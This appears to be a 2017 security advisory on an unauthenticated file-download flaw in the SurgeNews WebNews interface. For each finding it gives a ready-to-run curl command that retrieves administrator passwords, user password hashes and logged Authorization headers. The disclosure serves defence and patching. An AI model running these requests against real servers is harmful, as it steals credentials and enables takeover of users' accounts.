Group: netwin.surgemail
Subject: SurgeNews Unauthenticated Credential Disclosure
Date: Fri, 16 Jun 2017 18:13:47 -0500

The SurgeNews WebNews web interface on TCP ports 9080 and 8119 allows
unauthenticated users to download arbitrary files from within the
SurgeNews root directory.

This allows unauthenticated users to gain access to sensitive information,
including the administrator username and password in clear text.

Additionally, if the NWAuth authentication mechanism is in use (default),
then all usernames and associated password hashes can be retrieved from
various files such as nwauth.add and nwauth.clg.

Furthermore, various log files contain passwords in clear text.


### Download Admin Username and Password

The password.log file contains configuration information including the
administrator username and password in clear text if the administrator
has used `surgenews -password` to set the administrator username and password.

curl -isk 'http://surgenews.local:8119/webnews/?cmd=part&fname=password.log'


### Download Install Log

The install.log file includes the administrator username and password
configured during installation.

curl -isk 'http://surgenews.local:8119/webnews/?cmd=part&fname=install.log'


### Download Administrator Username and Password Hash

The admin.dat file contains the administrator username and password hash.

curl -isk 'http://surgenews.local:8119/webnews/?cmd=part&fname=admin.dat'


### Download Username and Password Hash for All Users

The nwauth.add and nwauth.clg files contain the usernames and password
hashes for all users if the NWAuth authentication mechanism is in use.

curl -isk 'http://surgenews.local:8119/webnews/?cmd=part&fname=nwauth.add'
curl -isk 'http://surgenews.local:8119/webnews/?cmd=part&fname=nwauth.clg'


### Download HTTP Logs

The wweb.log file includes details of incoming HTTP requests including HTTP
headers. The headers may include 'Authorization' headers which contain
credentials in clear text.

The web logs appear to be cleared periodically which decreases the chance
of credential disclosure in the web log.

curl -isk 'http://surgenews.local:8119/webnews/?cmd=part&fname=wweb.log' | grep Authorization


################################################################################
EOF


Attachment wntmp/tmp_1041190096_694_surgenews_unauthenticated_credential_disclosure.txt